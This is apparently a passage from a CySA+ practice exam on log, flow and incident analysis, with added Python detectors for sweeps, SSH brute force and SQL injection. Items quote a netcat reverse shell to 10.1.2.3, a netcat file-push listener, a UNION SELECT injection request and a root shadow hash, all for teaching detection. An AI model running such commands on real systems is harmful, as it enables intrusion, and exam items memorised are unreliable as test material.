    root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
    > daemon:*:16820:0:99999:7:::
    > bin:*:16820:0:99999:7:::
    > sys:*:16820:0:99999:7:::
    > sync:*:16820:0:99999:7:::
    > games:*:16820:0:99999:7:::
    > man:*:16820:0:99999:7:::
    > lp:*:16820:0:99999:7:::
    > mail:*:16820:0:99999:7:::
    > news:*:16820:0:99999:7:::
    > uucp:*:16820:0:99999:7:::
    > proxy:*:16820:0:99999:7:::
    > www-data:*:16820:0:99999:7:::
    > backup:*:16820:0:99999:7:::
    > list:*:16820:0:99999:7:::
    > irc:*:16820:0:99999:7::: 
    1. The root account has been compromised.
    2. An account named daemon has been added.
    3. The shadow password file has been modified.
    4. /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.
  87. Rick is reviewing flows of a system on his network and discovers the following flow logs. What is the system doing?
    ICMP "Echo request"
    Date flow start  Duration        Proto        Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows
    2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.6:8.0    11      924      1
    2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.6:0->10.1.1.1:0.0    11      924      1
    2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.7:8.0    11      924      1
    2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.7:0->10.1.1.1:0.0    11      924      1
    2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.8:8.0    11      924      1
    2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.8:0->10.1.1.1:0.0    11      924      1
    2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.9:8.0    11      924      1
    2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.9:0->10.1.1.1:0.0    11      924      1
    2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.10:8.0    11      924      1
    2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.10:0->10.1.1.1:0.0    11      924      1
    2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.6:11.0    11      924      1
    2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.11:0->10.1.1.1:0.0    11      924      1
    1. A port scan
    2. A failed three-way handshake
    3. A ping sweep
    4. A traceroute
  88. Bruce wants to integrate a security system with his SOAR. The security system provides real-time query capabilities, and Bruce wants to take advantage of this to provide up-to-the-moment data for his SOAR tool. What type of integration is best suited to this?
    1. CSV
    2. Flat file
    3. API
    4. Email
  89. Carol wants to analyze email as part of her antispam and antiphishing measures. Which of the following is least likely to show signs of phishing or other email-based attacks?
    1. The email's headers
    2. Embedded links in the email
    3. Attachments to the email
    4. The email signature block
  90. While reviewing NetFlows for a system on her network, Alice discovers the following traffic pattern. What is occurring?
    Date flow start          Duration  Proto  Src IP Addr:Port->Dst IP Addr:Port  Packets  Bytes  Flows
    2019-07-11 04:59:32.934  0.000     TCP    10.1.1.1:34543->10.2.2.6:22          160      1
    2019-07-11 04:59:39.730  0.000     TCP    10.1.1.1:34544->10.2.2.7:22          160      1
    2019-07-11 04:59:46.166  0.000     TCP    10.1.1.1:34545->10.2.2.8:22          160      1
    2019-07-11 04:59:52.934  0.000     TCP    10.1.1.1:34546->10.2.2.9:22          160      1
    2019-07-11 05:00:06.710  0.000     TCP    10.1.1.1:34547->10.2.2.10:22         160      1
    2019-07-11 05:00:46.160  0.000     TCP    10.1.1.1:34548->10.2.2.11:22         160      1
    2019-07-11 05:01:32.834  0.000     TCP    10.1.1.1:34549->10.2.2.12:22         160      1
    2019-07-11 05:01:39.430  0.000     TCP    10.1.1.1:34550->10.2.2.13:22         160      1
    2019-07-11 05:01:46.676  0.000     TCP    10.1.1.1:34551->10.2.2.14:22         160      1
    1. A telnet scan
    2. An SSH scan
    3. An SSH scan with unsuccessful connection attempts
    4. An SFTP scan with unsuccessful connection attempts
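    Questions 87 and 90 both turn on reading the same flow layout and spotting one source touching many destinations. The following parser and detector is an added example, not part of the question bank or any NetFlow product: it parses nfdump-style lines into records, flags an ICMP echo (type 8) sweep and a one-port TCP scan across many hosts, and checks whether any reply flows exist so the analyst can tell unanswered probes from completed conversations. The sample flows are constructed to mirror the two questions (with two answered pings and an ordinary HTTPS exchange added for contrast); the function names, the service-name table and the five-host threshold are choices made here.

```python
import re
from collections import defaultdict

# Constructed flow records in the nfdump-style layout used in the questions:
# ICMP echo requests from 10.1.1.1 to 10.2.2.6-11 (two of them answered),
# single-packet TCP/22 flows to 10.2.2.6-14 with no replies, and one normal
# HTTPS conversation. Sample data, not captured traffic.
SAMPLE_FLOWS = """\
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.6:8.0        11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.6:0->10.1.1.1:0.0        11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.7:8.0        11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.7:0->10.1.1.1:0.0        11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.8:8.0        11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.9:8.0        11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.10:8.0       11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.11:8.0       11      924      1
2019-07-11 04:59:32.934    0.000 TCP   10.1.1.1:34543->10.2.2.6:22      1       60      1
2019-07-11 04:59:39.730    0.000 TCP   10.1.1.1:34544->10.2.2.7:22      1       60      1
2019-07-11 04:59:46.166    0.000 TCP   10.1.1.1:34545->10.2.2.8:22      1       60      1
2019-07-11 04:59:52.934    0.000 TCP   10.1.1.1:34546->10.2.2.9:22      1       60      1
2019-07-11 05:00:06.710    0.000 TCP   10.1.1.1:34547->10.2.2.10:22     1       60      1
2019-07-11 05:00:46.160    0.000 TCP   10.1.1.1:34548->10.2.2.11:22     1       60      1
2019-07-11 05:01:32.834    0.000 TCP   10.1.1.1:34549->10.2.2.12:22     1       60      1
2019-07-11 05:01:39.430    0.000 TCP   10.1.1.1:34550->10.2.2.13:22     1       60      1
2019-07-11 05:01:46.676    0.000 TCP   10.1.1.1:34551->10.2.2.14:22     1       60      1
2019-07-11 05:02:10.004    1.212 TCP   10.1.1.1:34600->10.2.2.6:443    12     8011      1
2019-07-11 05:02:10.113    1.103 TCP   10.2.2.6:443->10.1.1.1:34600    10    41220      1
"""

# For ICMP the "port" field carries type.code, e.g. 8.0 = echo request, 0.0 = echo reply.
FLOW_RE = re.compile(
    r"^(?P<date>\S+)\s+(?P<time>\S+)\s+(?P<duration>[\d.]+)\s+(?P<proto>\w+)\s+"
    r"(?P<src>[\d.]+):(?P<sport>[\d.]+)->(?P<dst>[\d.]+):(?P<dport>[\d.]+)\s+"
    r"(?P<packets>\d+)\s+(?P<bytes>\d+)\s+(?P<flows>\d+)\s*$"
)

SERVICE_NAMES = {22: "ssh", 23: "telnet", 80: "http", 443: "https", 3389: "rdp"}


def parse_flows(text):
    """Parse nfdump-style flow lines into dicts; header and unparseable lines are skipped."""
    records = []
    for line in text.splitlines():
        m = FLOW_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        for field in ("packets", "bytes", "flows"):
            rec[field] = int(rec[field])
        records.append(rec)
    return records


def detect_sweeps(records, min_hosts=5):
    """Flag one source reaching >= min_hosts destinations: ICMP echo requests
    indicate a ping sweep; TCP flows to a single port across many hosts indicate
    a horizontal scan. 'answered' tells whether any host replied on that port."""
    icmp_targets = defaultdict(set)
    tcp_targets = defaultdict(set)
    seen = set()
    for r in records:
        seen.add((r["src"], r["sport"], r["dst"], r["dport"]))
        if r["proto"] == "ICMP" and r["dport"].startswith("8."):
            icmp_targets[r["src"]].add(r["dst"])
        elif r["proto"] == "TCP":
            tcp_targets[(r["src"], r["dport"])].add(r["dst"])

    findings = []
    for src, hosts in icmp_targets.items():
        if len(hosts) >= min_hosts:
            findings.append({"kind": "ping sweep", "src": src, "targets": len(hosts)})
    for (src, dport), hosts in tcp_targets.items():
        if len(hosts) < min_hosts:
            continue
        port = int(float(dport))
        # A reply flow runs dst:dport -> src; none at all means the probes went unanswered.
        answered = any(s in hosts and sp == dport and d == src for (s, sp, d, dp) in seen)
        findings.append({"kind": "horizontal scan", "src": src, "port": port,
                         "service": SERVICE_NAMES.get(port, "unknown"),
                         "targets": len(hosts), "answered": answered})
    return findings
```

    Run on the sample, the detector reports one ping sweep of six hosts and one unanswered nine-host scan of port 22, while the two-sided HTTPS exchange to a single host is left alone. Duration and byte counts are parsed too, so the same records can feed the long-lived, large-transfer checks that the later flow questions in this chapter rely on.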
  91. Ric is working on reverse-engineering a malware sample and wants to run the binary but also control the execution as it occurs. What type of tool should he select for this?
    1. A disassembler
    2. A decompiler
    3. A debugger
    4. An unpacker
  92. Jennifer wants to search for terms including “CySA+” and all other variations of the text regardless of which letters may be capitalized. Which of the following commands will find all the terms that match what she is searching for in a text file named example.txt?
    1. grep -i cysa+ example.txt
    2. grep -uc CySA+ example.txt
    3. grep -case cysa+ example.txt
    4. grep example.txt cysa+
  93. Juliette wants to decrease the risk of embedded links in email. Which of the following solutions is the most common method for doing this?
    1. Removing all links in email
    2. Redirecting links in email to a proxy
    3. Scanning all email using an antimalware tool
    4. Using a DNS blackhole and IP reputation list
  94. James wants to use an automated malware signature creation tool. What type of environment do tools like this unpack and run the malware in?
    1. A sandbox
    2. A physical machine
    3. A container
    4. A DMARC
  95. While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
    Date flow start          Duration   Proto  Src IP Addr:Port->Dst IP Addr:Port  Packets  Bytes  Flows
    2019-07-11 13:06:46.343  21601804   TCP    10.1.1.1:1151->10.2.2.3:443          9473640  9.1 G  1
    2019-07-11 13:06:46.551  21601804   TCP    10.2.2.3:443->10.1.1.1:1151          8345101  514 M  1
    1. A web browsing session
    2. Data exfiltration
    3. Data infiltration
    4. A vulnerability scan
  96. Luis discovers the following entries in /var/log/auth.log. What is most likely occurring?
    Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
    Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
    Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
    Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
    Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
    Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
    Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
    Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
    Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
    Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2 
    1. A user has forgotten their password
    2. A brute-force attack against the root account
    3. A misconfigured service
    4. A denial-of-service attack against the root account
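    The log excerpt above is the kind of input a SIEM rule or a host-based tool would consume. The following is an added example, not part of the question bank or of any product such as fail2ban: it parses sshd "Failed password" lines from auth.log and raises an alert when one source address fails against one account at least a threshold number of times inside a sliding time window, so a forgotten password (a few scattered failures) and a rapid series of failures from one host produce different results. The ten lines are taken from the question; the two lines for a second user are constructed for contrast. Syslog timestamps carry no year, so the year is an assumption (2019), and the threshold, window and function names are choices made here.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The ten sshd lines from the question, followed by two constructed lines for a
# different user (one failure, then a successful key-based login). Sample data only.
SAMPLE_AUTH_LOG = """\
Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
Aug 6 14:20:11 demo sshd[5400]: Failed password for alice from 10.11.34.50 port 40102 ssh2
Aug 6 14:20:19 demo sshd[5400]: Accepted publickey for alice from 10.11.34.50 port 40102 ssh2: ED25519 SHA256:constructedfingerprint
"""

FAILED_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) (?P<host>\S+) "
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_failures(lines, year=2019):
    """Return (timestamp, user, source_ip) for each 'Failed password' line.
    Syslog timestamps have no year, so one must be supplied (assumed 2019 here)."""
    failures = []
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins, PAM notices, etc. are not failures
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        failures.append((ts, m["user"], m["ip"]))
    return failures


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Alert when one source IP fails against one account `threshold` or more
    times within any sliding interval of length `window`."""
    by_key = defaultdict(list)
    for ts, user, ip in sorted(parse_failures(lines)):
        by_key[(ip, user)].append(ts)

    alerts = []
    for (ip, user), stamps in by_key.items():
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1          # slide the window forward past old failures
            if end - start + 1 >= threshold:
                alerts.append({"src_ip": ip, "user": user, "failures": len(stamps),
                               "first": stamps[0].isoformat(), "last": stamps[-1].isoformat()})
                break
    return alerts
```

    Keying on (source IP, account) rather than on the account alone keeps a single impatient user from tripping the rule while still catching ten failures in two seconds from one address. Tools such as fail2ban apply the same idea and then add a firewall rule for the offending source; the detection half is what is shown here.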
  97. Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH?
    1. Add an iptables rule blocking root logins
    2. Add root to the sudoers group
    3. Change sshd_config to deny root login
    4. Add a network IPS rule to block root logins
  98. Azra's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command.
    at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe 

    What does it do?

    1. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.
    2. It uses the AT command to dial a remote host via NetBIOS.
    3. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30.
    4. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.
  99. While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:
    Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
    Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6> 3
    Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
    Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
    Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth] 

    Which of the following has not occurred?

    1. A user has attempted to reauthenticate too many times.
    2. PAM is configured for three retries and will reject any additional retries in the same session.
    3. Fail2ban has blocked the SSH login attempts.
    4. Root is attempting to log in via SSH from the local host.
  100. Fred has been tasked with configuring his organization's NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a user's job?
    1. Time-based
    2. Rule-based
    3. Role-based
    4. Location-based
  101. Naomi wants to analyze malware by running it and capturing what it does. What type of tool should she use?
    1. A containerization tool
    2. A virtualization tool
    3. A sandbox tool
    4. A packet analyzer
  102. While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command:
    nc -l -p 43501 < example.zip 

    What happened?

    1. The user set up a reverse shell running as example.zip.
    2. The user set up netcat as a listener to push example.zip.
    3. The user set up a remote shell running as example.zip.
    4. The user set up netcat to receive example.zip.
  103. Susan is hunting threats and performs the following query against her database of event logs. What type of threat is she looking for?
    Select source.name, destination.name, count(*) from network-events, where destination.port = '3389' 
    1. SSH
    2. MySQL
    3. RDP
    4. IRC
  104. At what point in a continuous integration (CI)/continuous delivery (CD) pipeline should security testing be performed?
    1. After code is checked into the repository
    2. After code is deployed into an automated test environment
    3. After the code is deployed into production
    4. All of the above
  105. Lukas wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Lukas accomplish this for Windows 10 Pro workstations?
    1. Using application whitelisting to prevent all prohibited programs from running
    2. Using Windows Defender and adding the game to the blacklist file
    3. Listing it in the Blocked Programs list via secpol.msc
    4. You cannot blacklist applications in Windows 10 without a third-party application
  106. While reviewing his Apache logs, Oscar discovers the following entry. What has occurred?
    10.1.1.1 - - [27/Jun/2019:11:42:22 -0500] "GET /query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    1. A successful database query
    2. A php overflow attack
    3. A SQL injection attack
    4. An unsuccessful database query
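    Reviewing web server logs for this kind of request is usually automated. The following is an added example, not part of the question bank or of Apache: it parses Apache combined-format entries, URL-decodes the request path (twice, because encoding is sometimes nested to hide keywords) and reports requests whose decoded query matches a small set of SQL-injection indicators, alongside the status code and response size a reviewer would compare against a normal response. The first sample line is the entry from the question joined onto one line; the second is a constructed benign request. The indicator list and function names are choices made here and are deliberately short; a production ruleset would be broader.

```python
import re
from urllib.parse import unquote

# The log entry from the question on one line, plus a constructed benign
# request for contrast. Sample data, not production logs.
SAMPLE_ACCESS_LOG = [
    '10.1.1.1 - - [27/Jun/2019:11:42:22 -0500] "GET /query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,'
    'username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"',
    '10.1.1.7 - - [27/Jun/2019:11:43:01 -0500] "GET /query.php?searchterm=stuff HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Apache "combined" log format: host ident user [time] "request" status size "referer" "user-agent"
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators checked against the decoded request; names are reported to the analyst.
SQLI_PATTERNS = [
    ("union select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("tautology", re.compile(r"['\"]\s*or\s+['\"\d]", re.I)),      # e.g. ' or 1=1
    ("comment terminator", re.compile(r"(?:--|#|/\*)\s*$")),
    ("stacked query", re.compile(r";\s*(?:drop|insert|update|delete)\b", re.I)),
]


def parse_apache_line(line):
    """Parse one combined-format entry into a dict, or None if the line does not match."""
    m = APACHE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = None if rec["size"] == "-" else int(rec["size"])
    return rec


def sqli_indicators(path):
    """Names of the SQLI_PATTERNS that match the URL-decoded request path."""
    decoded = unquote(unquote(path))  # second pass catches double-encoded payloads (%2520 etc.)
    return [name for name, pattern in SQLI_PATTERNS if pattern.search(decoded)]


def review_log(lines):
    """Return one finding per request that carries an injection indicator."""
    findings = []
    for line in lines:
        rec = parse_apache_line(line)
        if rec is None:
            continue
        hits = sqli_indicators(rec["path"])
        if hits:
            findings.append({"src": rec["ip"], "time": rec["ts"], "status": rec["status"],
                             "size": rec["size"], "indicators": hits, "path": rec["path"]})
    return findings
```

    The status and size fields are carried into the finding because they are what distinguishes a blocked or failed attempt from a request the application processed: a 200 with a response much larger than the page normally returns is the signal to pull the corresponding database and application logs.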
  107. Jason wants to reverse-engineer a malware package. Which of the following tools should he use if he wants to do behavior-based analysis of a worm?
    1. A disassembler
    2. A network analyzer
    3. A PE viewer
    4. A debugger
  108. What will a search using the following command do?
    grep -n -i -v mike *
    1. List all the lines where the word Mike shows up, regardless of case in all files in the current directory
    2. Search all files with the word mike in the filename for lowercase words
    3. Search a file named mike for all uppercase words
    4. List all the lines where the word Mike does not show up, regardless of case, in all files in the current directory
  109. Ian lists the permissions for a Linux file that he believes may have been modified by an attacker. What do the permissions shown here mean?
    -rwxrw-r-- 1 chuck admingroup 1232 Feb 28 16:22 myfile.txt
    1. User chuck has read and write rights to the file; the administrators group has read, write, and execute rights; and all other users only have read rights.
    2. User admingroup has read rights; group chuck has read and write rights; and all users on the system can read, write, and execute the file.
    3. User chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.
    4. User admingroup has read, write, and execute rights on the file; user chuck has read and write rights; and all other users have read rights to the file.
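    Reading a mode field by hand is error-prone once setuid, setgid and sticky bits enter the picture. The following is an added example, not part of the question bank: it decodes any 10-character ls -l mode field into per-class rights, the special bits (shown as s/S/t/T in the execute slot) and the four-digit octal mode, and renders a full ls -l line as a plain-English sentence. It goes beyond the question's plain rwx case to cover the special bits, since a file with an unexpected setuid bit is exactly what a reviewer checking for attacker modifications needs to notice. The sample line is the listing from the question; function names are choices made here.

```python
FILE_TYPES = {"-": "regular file", "d": "directory", "l": "symbolic link",
              "c": "character device", "b": "block device", "p": "named pipe", "s": "socket"}

# The listing from the question, with the mode field as it reads in the answer options.
SAMPLE_LS_LINE = "-rwxrw-r-- 1 chuck admingroup 1232 Feb 28 16:22 myfile.txt"


def parse_mode(mode):
    """Decode a 10-character ls -l mode field into per-class rights, special bits
    and the 4-digit octal mode. In the execute slot, 's'/'t' mean the special bit
    plus execute; 'S'/'T' mean the special bit without execute."""
    if len(mode) != 10 or mode[0] not in FILE_TYPES:
        raise ValueError(f"not an ls -l mode field: {mode!r}")
    rights, special, perm_bits, special_bits = {}, [], 0, 0
    for cls, (r, w, x), name, bit in (("owner", mode[1:4], "setuid", 4),
                                      ("group", mode[4:7], "setgid", 2),
                                      ("other", mode[7:10], "sticky", 1)):
        execute = x in "xst"
        if x in "sStT":
            special_bits |= bit
            special.append(name)
        perm_bits = perm_bits * 8 + (4 if r == "r" else 0) + (2 if w == "w" else 0) + (1 if execute else 0)
        rights[cls] = {p for p, on in (("read", r == "r"), ("write", w == "w"), ("execute", execute)) if on}
    return {"type": FILE_TYPES[mode[0]], "rights": rights, "special": special,
            "octal": format((special_bits << 9) | perm_bits, "04o")}


def parse_ls_line(line):
    """Split one ls -l line into its fields and decode the mode."""
    parts = line.split(None, 8)
    if len(parts) != 9:
        raise ValueError(f"unexpected ls -l line: {line!r}")
    mode, links, owner, group, size, month, day, clock, name = parts
    info = parse_mode(mode)
    info.update({"owner": owner, "group": group, "size": int(size), "links": int(links),
                 "modified": f"{month} {day} {clock}", "name": name})
    return info


def _words(perms):
    names = [p for p in ("read", "write", "execute") if p in perms]
    if not names:
        return "has no access"
    if len(names) < 3:
        return "can " + " and ".join(names)
    return f"can {names[0]}, {names[1]} and {names[2]}"


def describe(line):
    """Plain-English reading of an ls -l line, including any special bits."""
    info = parse_ls_line(line)
    extra = f", with {' and '.join(info['special'])} set" if info["special"] else ""
    return (f"{info['name']} is a {info['type']} (mode {info['octal']}{extra}) owned by {info['owner']}, "
            f"group {info['group']}: the owner {_words(info['rights']['owner'])}; "
            f"the group {_words(info['rights']['group'])}; everyone else {_words(info['rights']['other'])}.")
```

    The octal form is what a file-integrity baseline or a find -perm check records, so producing it alongside the prose makes the output directly comparable to a known-good inventory.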
  110. While reviewing web server logs, Danielle notices the following entry. What occurred?
    10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200 
    1. A theme was changed
    2. A file was not found
    3. An attempt to edit the 404 page
    4. The 404 page was displayed
  111. Melissa wants to deploy a tool to coordinate information from a wide range of platforms so that she can see it in a central location and then automate responses as part of security workflows. What type of tool should she deploy?
    1. UEBA
    2. SOAR
    3. SIEM
    4. MDR
  112. While attempting to stop a rogue service, Monica issues the following Linux command on an Ubuntu system using upstart:
    service rogueservice stop 

    After a reboot, she discovers the service running again. What happened, and what does she need to do to prevent this?

    1. The service restarted at reboot, so she needs to include the -p, or permanent, flag.
    2. The service restarted itself, so she needs to delete the binary associated with the service.
    3. The service restarted at reboot, so she should add an .override file to stop the service from starting.
    4. A malicious user restarted the service, so she needs to ensure users cannot restart services.
  113. Why might Mark choose to implement an IPS instead of an IDS?
    1. The IPS can detect attacks that an IDS cannot.
    2. The IPS can block attacks in addition to reporting them.
    3. The IPS can use heuristic analysis.
    4. The IPS can use signature-based analysis.
  114. While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks on the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?
    Snapshot of Wireshark packet capture by using the ESP protocol.
    1. An encrypted RAT
    2. A VPN application
    3. A secure web browser
    4. A base64 encoded packet transfer utility
  115. Bohai uses the following command while investigating a Windows workstation used by his organization's vice president of Finance, who only works during normal business hours. Bohai believes that the workstation has been used without permission by members of his organization's cleaning staff after hours. What does he know if the userID shown is the only userID able to log in to the system, and he is investigating on August 12, 2019?
    C:\Users\igfish>wmic netlogin get name,lastlogon,badpasswordcount
    BadPasswordCount  LastLogon                  Name
                                                 NT AUTHORITY\SYSTEM
    0                 20190811203748.000000-240  Finance\igfish
    1. The account has been compromised.
    2. No logins have occurred.
    3. The last login was during business hours.
    4. Bohai cannot make any determinations from this information.
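    The LastLogon value above is in WMI's CIM_DATETIME form (yyyymmddHHMMSS.mmmmmm followed by the UTC offset in minutes), which is easy to misread by eye. The following is an added example, not part of the question bank or of Windows: it parses that output, converts the timestamp to a timezone-aware datetime, and reports the weekday, whether the logon fell outside business hours, and how many days before the investigation date it occurred. The sample is the command output from the question with the prompt line omitted; the 08:00-18:00 business-hours window, the date-string parameter and the function names are assumptions made here.

```python
import re
from datetime import date, datetime, time, timedelta, timezone

# Output of the wmic command from the question (prompt line omitted); the
# Finance\igfish record is the one under investigation. Sample data only.
SAMPLE_WMIC_OUTPUT = """\
BadPasswordCount  LastLogon                  Name
                                             NT AUTHORITY\\SYSTEM
0                 20190811203748.000000-240  Finance\\igfish
"""

# WMI CIM_DATETIME: yyyymmddHHMMSS.mmmmmm then a signed UTC offset in minutes (-240 = UTC-4).
CIM_RE = re.compile(r"^(\d{4})(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})\.(\d{6})([+-])(\d{3})$")
CIM_TOKEN = re.compile(r"\d{14}\.\d{6}[+-]\d{3}")


def parse_cim_datetime(value):
    """Convert a CIM_DATETIME string into a timezone-aware datetime."""
    m = CIM_RE.match(value)
    if not m:
        raise ValueError(f"not a CIM_DATETIME value: {value!r}")
    y, mo, d, h, mi, s, us, sign, offset_min = m.groups()
    offset = timedelta(minutes=int(offset_min))
    if sign == "-":
        offset = -offset
    return datetime(int(y), int(mo), int(d), int(h), int(mi), int(s), int(us), tzinfo=timezone(offset))


def outside_business_hours(dt, start=time(8, 0), end=time(18, 0)):
    """True on a weekend or outside start..end, judged in the timestamp's own UTC offset
    (assumed here to be the workstation's local time)."""
    return dt.weekday() >= 5 or not (start <= dt.time() < end)


def review_netlogin(output, investigation_date):
    """Parse `wmic netlogin get name,lastlogon,badpasswordcount` output and annotate each
    account; investigation_date is an ISO date string such as '2019-08-12'."""
    findings = []
    for line in output.splitlines()[1:]:  # skip the column header
        m = CIM_TOKEN.search(line)
        if not m:
            name = line.strip()
            if name:  # an account with no recorded logon, e.g. the builtin SYSTEM entry
                findings.append({"name": name, "last_logon": None})
            continue
        dt = parse_cim_datetime(m.group())
        findings.append({
            "name": line[m.end():].strip(),
            "bad_passwords": int(line[:m.start()].split()[0]),
            "last_logon": dt.isoformat(),
            "weekday": dt.strftime("%A"),
            "after_hours": outside_business_hours(dt),
            "days_since_logon": (date.fromisoformat(investigation_date) - dt.date()).days,
        })
    return findings
```

    LastLogon is a single most-recent value, not a history, so it can only show that the latest interactive logon fell outside the expected pattern; the Security event log (4624 and 4634 events with logon type) is where the full sequence of sessions would be reconstructed.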
  116. After a series of compromised accounts led to her domain being blacklisted, Wang has been asked to restore her company's email as quickly as possible. Which of the following options is not a valid way to allow her company to send email successfully?
    1. Migrate her company's SMTP servers to new IP addresses.
    2. Migrate to a cloud email hosting provider.
    3. Change SMTP headers to prevent blacklisting.
    4. Work with the blacklisting organizations to get removed from the list.
  117. While reviewing indicators of compromise, Dustin notices that notepad.exe has opened a listener port on the Windows machine he is investigating. What is this an example of?
